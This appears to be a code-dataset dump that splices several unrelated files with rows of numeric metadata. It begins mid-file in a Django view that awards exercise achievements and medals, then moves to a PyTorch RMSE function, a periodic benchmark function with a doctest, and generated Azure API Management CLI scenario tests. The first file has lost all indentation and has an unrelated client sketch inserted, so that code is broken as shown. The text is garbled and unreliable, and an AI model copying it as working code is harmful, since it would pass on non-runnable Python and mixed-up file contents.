Achievement.objects.create(name='perfectExercise', title='{"en":"Perfect Exercise","de":"Perfekte Übung"}', description='{"en": "Complete an exercise with 100 percent", "de": "Erreiche 100 Prozent bei einer Übung"}', icon=icon_dict)
achievement = Achievement.objects.get(name='perfectExercise')
#check if achievement already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
found = False
#get all done exercises
all = DoneExercises.objects.filter(user=user)
#search for exercise with MAX_POINTS
for a in all:
if a.points == MAX_POINTS:
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#night owl
if not Achievement.objects.filter(name='nightOwl').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'nightOwl_0.svg","1":"' + ROOT_PATH + 'nightOwl_1.svg"}'
Achievement.objects.create(name='nightOwl', title='{"en":"Night Owl","de":"Nachteule"}', description='{"en": "Do an exercise between 10 PM and 6 AM", "de": "Mache eine Übung zwischen 10 Uhr abends und 6 Uhr morgens"}', hidden=True, icon=icon_dict)
achievement = Achievement.objects.get(name='nightOwl')
#check if achievement already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
found = False
#get all done exercises
all = DoneExercises.objects.filter(user=user)
#check whether any exercise was done during the night
for a in all:
if ((a.date % 86400) > NIGHT_START) or ((a.date % 86400) < NIGHT_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#earlyBird
if not Achievement.objects.filter(name='earlyBird').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'earlyBird_0.svg","1":"' + ROOT_PATH + 'earlyBird_1.svg"}'
Achievement.objects.create(name='earlyBird', title='{"en":"Early Bird","de":"Der frühe Vogel.."}', description='{"en": "Do an exercise early in the morning (between 6 AM and 8 AM)", "de": "Mache eine Übung frühmorgens (zwischen 6 und 8 Uhr)"}', hidden=True, icon=icon_dict)
achievement = Achievement.objects.get(name='earlyBird')
#check if achievement already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
found = False
#get all exercises
all = DoneExercises.objects.filter(user=user)
#check whether any exercise was done early in the morning
for a in all:
if ((a.date % 86400) > NIGHT_END) and ((a.date % 86400) < EARLY_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#streak
if not Achievement.objects.filter(name='streak').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'streak_0.svg","1":"' + ROOT_PATH + 'streak_1.svg","2":"' + ROOT_PATH + 'streak_2.svg","3":"' + ROOT_PATH + 'streak_3.svg","4":"' + ROOT_PATH + 'streak_4.svg"}'
Achievement.objects.create(name='streak', title='{"en":"Streak","de":"Streak"}', description='{"en": "Reach a streak", "de": "Erreiche eine Streak"}', icon=icon_dict)
achievement = Achievement.objects.get(name='streak')
#check if achievement already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user, level=4).exists():
#get users streak
streak = user.streak
#check which level is reached
if streak >= 90:
res = AchievementHandler.upgrade_level(user, achievement, 4)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 4,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(4, achievement.icon)
})
elif streak >= 30:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': str(streak)+'/90',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif streak >= 7:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(streak)+'/30',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif streak >= 3:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(streak)+'/7',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#check if new achieved
if len(achieved) == 0:
data = {
'success': True,
'description': 'Not achieved',
'data': {}
}
else:
data = {
'success': True,
'description': 'new achieved',
'data': {
'achievements': achieved
}
}
return Response(data)
class GetMedals(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#check if user
if not info['account_type'] == 'user':
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
medals = UserMedalInExercise.objects.filter(user=user)
output = []
for mex in medals:
output.append({
'exercise': mex.exercise.title,
'gold': mex.gold,
'silver': mex.silver,
'bronze': mex.bronze
})
data = {
'success': True,
'description': 'returning medals',
'data': {
'medals': output
}
}
return Response(data)
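# Illustrative client-side sketch (not part of this module): every view above
# returns the same envelope {'success', 'description', 'data'} and reads a
# 'Session-Token' header. The URL below is hypothetical; the real routes live
# in the project's urls.py, which is not shown here.
if __name__ == '__main__':
    import requests  # assumed available; any HTTP client works

    resp = requests.get(
        'https://example.invalid/api/getAchievements/',           # hypothetical route
        headers={'Session-Token': '<session token from login>'},
    )
    body = resp.json()
    if body['success']:
        for ach in body['data']['achievements']:
            print(ach['name'], ach['level'], ach['progress'])
    else:
        print(body['description'])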
| 50.835512
| 294
| 0.482911
| 3,806
| 46,667
| 5.815292
| 0.059905
| 0.037952
| 0.050603
| 0.068314
| 0.93015
| 0.921339
| 0.915646
| 0.913794
| 0.907288
| 0.905119
| 0
| 0.012857
| 0.413333
| 46,667
| 918
| 295
| 50.835512
| 0.795566
| 0.034157
| 0
| 0.843256
| 0
| 0.009721
| 0.153725
| 0.016619
| 0
| 0
| 0
| 0.001089
| 0
| 1
| 0.00486
| false
| 0
| 0.008505
| 0
| 0.065614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8f551e28c10c64b7eeaf69d23999e1cd53dfddc
| 193
|
py
|
Python
|
model/loss.py
|
theLongLab/group-lasso-nn
|
6d7b9ffe2867b0efe99d6062bbb8b09ec12155c2
|
[
"MIT"
] | null | null | null |
model/loss.py
|
theLongLab/group-lasso-nn
|
6d7b9ffe2867b0efe99d6062bbb8b09ec12155c2
|
[
"MIT"
] | null | null | null |
model/loss.py
|
theLongLab/group-lasso-nn
|
6d7b9ffe2867b0efe99d6062bbb8b09ec12155c2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import torch
import torch.nn.functional as F
def rmse(output: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
return torch.sqrt(F.mse_loss(output, target))
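# Quick usage sketch (illustrative, not part of the original file):
if __name__ == "__main__":
    pred = torch.tensor([2.0, 4.0])
    target = torch.tensor([1.0, 3.0])
    print(rmse(pred, target))  # tensor(1.) -- both element-wise errors are exactly 1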
| 19.3
| 69
| 0.699482
| 29
| 193
| 4.62069
| 0.62069
| 0.246269
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006098
| 0.150259
| 193
| 9
| 70
| 21.444444
| 0.810976
| 0.108808
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2b0b1cad151586a748e966c409fdcd77263b2572
| 5,656
|
py
|
Python
|
MDAF/TestFunctions/Periodic.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | 1
|
2020-12-30T23:04:51.000Z
|
2020-12-30T23:04:51.000Z
|
MDAF/TestFunctions/Periodic.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
MDAF/TestFunctions/Periodic.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
import math
def main(args):
'''
>>> (main([0,0]) - 0.9)<0.001
True
#_# dimmensions: 2
#_# upper: 10
#_# lower: -10
#_# minimum: [0,0]
#_# opti: 0.9
#_# cm_angle: array([[1.75593580e+00], [2.65321236e-01], [4.87617228e-01], [2.59067658e-01], [1.31559946e+02], [4.22034384e+01], [8.81116275e-01], [6.32096982e-02], [0.00000000e+00], [6.81000000e-01]])
#_# cm_conv: array([[0.28846154], [0.32692308], [0.46153846], [0.53846154], [0. ], [0.13 ]])
#_# cm_grad: array([[0.27864322], [0.13841195], [0. ], [0.433 ]])
#_# ela_conv: array([[4.16000000e-01], [0.00000000e+00], [9.44507865e-02], [4.63473862e-01], [1.00000000e+03], [2.05200000e+00]])
#_# ela_curv: array([[1.96335006e-02], [7.90494696e-01], [9.40517924e-01], [9.70508422e-01], [1.15146017e+00], [1.40827470e+00], [2.96278026e-01], [0.00000000e+00], [1.00042900e+00], [1.20667873e+00], [1.37489634e+01], [1.74597326e+00], [3.87776532e+00], [1.54010785e+03], [1.10794257e+02], [0.00000000e+00], [1.00004273e+00], [1.15887166e+00], [6.45569964e+00], [1.65200491e+00], [3.28908531e+00], [2.84602626e+02], [2.66078823e+01], [0.00000000e+00], [8.40000000e+03], [7.87500000e+00]])
#_# ela_distr: array([[ 0.10282964], [-0.79626524], [ 4. ], [ 0. ], [ 0.066 ]])
#_# ela_local: array([[9.00000000e+01], [9.00000000e-01], [9.04018379e-01], [9.55549808e-01], [1.00000000e-02], [1.11235955e-02], [1.00000000e-02], [2.50000000e+01], [3.00000000e+01], [4.13500000e+01], [4.00000000e+01], [4.50000000e+01], [9.00000000e+01], [1.30239678e+01], [4.22500000e+03], [2.58300000e+00]])
#_# ela_meta: array([[-5.92296020e-03], [ 1.95370338e+00], [ 3.86726095e-04], [ 1.04562694e-03], [ 2.70379204e+00], [-7.97249787e-03], [ 1.22049304e-02], [ 1.04972191e+00], [ 1.38023108e-05], [ 0.00000000e+00], [ 5.90000000e-02]])
#_# basic: array([[ 2.00000000e+00], [ 5.00000000e+02], [-1.00000000e+01], [-1.00000000e+01], [ 1.00000000e+01], [ 1.00000000e+01], [ 1.00605701e+00], [ 2.99797225e+00], [ 6.00000000e+00], [ 6.00000000e+00], [ 3.60000000e+01], [ 3.60000000e+01], [ 1.00000000e+00], [ 0.00000000e+00], [ 1.00000000e-03]])
#_# disp: array([[1.24018699], [1.09742031], [1.05147535], [1.03706056], [1.2976655 ], [1.10184985], [1.01192384], [1.01497513], [2.50946641], [1.0178444 ], [0.53781287], [0.38720762], [3.0525099 ], [1.04445318], [0.12227698], [0.15356744], [0. ], [0.047 ]])
#_# limo: array([[ 1.02009742e-02], [ 7.78878285e-02], [ 2.22441463e-01], [ 9.89624222e-02], [-1.80105180e-01], [-1.10989188e-01], [ 7.45768785e+00], [ 2.52375269e+01], [ 1.00637086e+00], [ 1.05016349e+00], [ 1.74039998e-01], [ 7.14744674e-01], [ 0.00000000e+00], [ 2.45000000e-01]])
#_# nbc: array([[ 0.10083485], [ 0.69048795], [ 0.09078319], [ 0.26259763], [-0.63877451], [ 0. ], [ 0.237 ]])
#_# pca: array([[1. ], [1. ], [0.66666667], [1. ], [0.50356834], [0.5035681 ], [0.50162655], [0.33870974], [0. ], [0.012 ]])
#_# gcm: array([[5. ], [0.13888889], [0.86111111], [0.55555556], [0.11298693], [0.2 ], [0.22371662], [0.31365693], [0.08447559], [0.02777778], [0.08888889], [0.05555556], [0.16666667], [0.06022079], [0.44444444], [0.05555556], [0.2 ], [0.22222222], [0.33333333], [0.11520245], [1. ], [0.23060847], [0.02777778], [0. ], [0.177 ], [3. ], [0.08333333], [0.91666667], [0.33333333], [0.12484877], [0.33333333], [0.24342663], [0.6317246 ], [0.26512862], [0.05555556], [0.22222222], [0.13888889], [0.47222222], [0.22047928], [0.66666667], [0.11111111], [0.33333333], [0.22222222], [0.66666667], [0.29397237], [1. ], [0.6317246 ], [0.02777778], [0. ], [0.174 ], [6. ], [0.16666667], [0.83333333], [0.66666667], [0.08031645], [0.16666667], [0.15416039], [0.28511054], [0.09222196], [0.02777778], [0.05555556], [0.02777778], [0.11111111], [0.04303315], [0.33333333], [0.05555556], [0.16666667], [0.15277778], [0.30555556], [0.10971343], [1. ], [0.21749947], [0.02777778], [0. ], [0.19 ]])
#_# ic: array([[ 0.84108627], [ 0.10510511], [ 0.35038422], [-0.25525526], [ 0.51004016], [ 0. ], [ 1.611 ]])
#_# Represented: 1
'''
return 1 + (math.sin(args[0]))**2 + (math.sin(args[1]))**2 - 0.1*math.exp(-1*(args[0]**2+args[1]**2))
if __name__ == "__main__":
import doctest
doctest.testmod()
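# Worked check (illustrative, not part of the original file): at the stated
# minimum [0, 0] the function evaluates to
#   1 + sin(0)**2 + sin(0)**2 - 0.1*exp(-(0**2 + 0**2)) = 1 - 0.1 = 0.9,
# which matches the "#_# opti: 0.9" entry in the docstring and is what the
# doctest at the top verifies to within 0.001.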
| 145.025641
| 1,511
| 0.443069
| 633
| 5,656
| 3.900474
| 0.333333
| 0.015796
| 0.038882
| 0.022681
| 0.035237
| 0.019846
| 0.019846
| 0.019846
| 0.019846
| 0.019846
| 0
| 0.555436
| 0.342999
| 5,656
| 38
| 1,512
| 148.842105
| 0.108988
| 0.968352
| 0
| 0
| 0
| 0
| 0.038278
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b1a03c768dfcf9e83f715b3d080881f4eeb9cbc
| 112,915
|
py
|
Python
|
generated/azure-cli/apim/tests/latest/test_apim_scenario.py
|
audevbot/autorest.devops.debug
|
a507fb6e2dd7826212537f27d583f203aac1c28f
|
[
"MIT"
] | null | null | null |
generated/azure-cli/apim/tests/latest/test_apim_scenario.py
|
audevbot/autorest.devops.debug
|
a507fb6e2dd7826212537f27d583f203aac1c28f
|
[
"MIT"
] | null | null | null |
generated/azure-cli/apim/tests/latest/test_apim_scenario.py
|
audevbot/autorest.devops.debug
|
a507fb6e2dd7826212537f27d583f203aac1c28f
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import unittest
from azure_devtools.scenario_tests import AllowLargeResponse
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
class ApimgmtScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_apimgmt')
def test_apimgmt(self, resource_group):
self.kwargs.update({
'name': 'test1'
})
# create_or_update -- create
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "https://raw.githubusercontent.com/OAI/OpenAPI-Specification/master/examples/v3.0/petstore.yaml" --format "openapi-link"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "http://petstore.swagger.io/v2/swagger.json" --format "swagger-link-json"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "collector" --value "https://developer.cisco.com/media/wae-release-6-2-api-reference/wae-collector-rest-api/application.wadl" --format "wadl-link-json"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link" --api-type "soap"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "apidescription5200" --display-name "apiname1463" --service-url "http://newechoapi.cloudapp.net/api" --path "newapiPath"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3" --api-revision-description "Creating a Revision of an existing API" --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --service-url "http://echoapi.cloudapp.net/apiv3" --path "echo"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3" --description "Create Echo API into a new Version using Existing Version Set and Copy all Operations." --api-version "v4" --is-current true --api-version-set-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apiVersionSets/{{ api_version_set_name }}" --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2" --description "Copy of Existing Echo Api including Operations." --is-current true --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters." --display-name "Swagger Petstore" --service-url "http://petstore.swagger.io/v2" --path "petstore"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "apidocs" --service-url "http://petstore.swagger.wordnik.com/api" --path "petstoreapi123" --value "http://apimpimportviaurl.azurewebsites.net/api/apidocs/" --format "swagger-link"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --display-name "Echo API New" --service-url "http://echoapi.cloudapp.net/api2" --path "newecho"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
# create_or_update -- update
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "https://raw.githubusercontent.com/OAI/OpenAPI-Specification/master/examples/v3.0/petstore.yaml" --format "openapi-link"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "http://petstore.swagger.io/v2/swagger.json" --format "swagger-link-json"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "collector" --value "https://developer.cisco.com/media/wae-release-6-2-api-reference/wae-collector-rest-api/application.wadl" --format "wadl-link-json"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link" --api-type "soap"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "apidescription5200" --display-name "apiname1463" --service-url "http://newechoapi.cloudapp.net/api" --path "newapiPath"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3" --api-revision-description "Creating a Revision of an existing API" --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --service-url "http://echoapi.cloudapp.net/apiv3" --path "echo"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3" --description "Create Echo API into a new Version using Existing Version Set and Copy all Operations." --api-version "v4" --is-current true --api-version-set-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apiVersionSets/{{ api_version_set_name }}" --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2" --description "Copy of Existing Echo Api including Operations." --is-current true --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters." --display-name "Swagger Petstore" --service-url "http://petstore.swagger.io/v2" --path "petstore"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "apidocs" --service-url "http://petstore.swagger.wordnik.com/api" --path "petstoreapi123" --value "http://apimpimportviaurl.azurewebsites.net/api/apidocs/" --format "swagger-link"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --display-name "Echo API New" --service-url "http://echoapi.cloudapp.net/api2" --path "newecho"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
# delete -- delete
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "apidocs"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
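# The generator emits one `apim api list` invocation per swagger example, so the
# list_by_tags and list_by_service sections below repeat the same command; each
# call only verifies that listing succeeds.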
# list_by_tags -- list
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_service -- list
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "apidocs"', checks=[
])
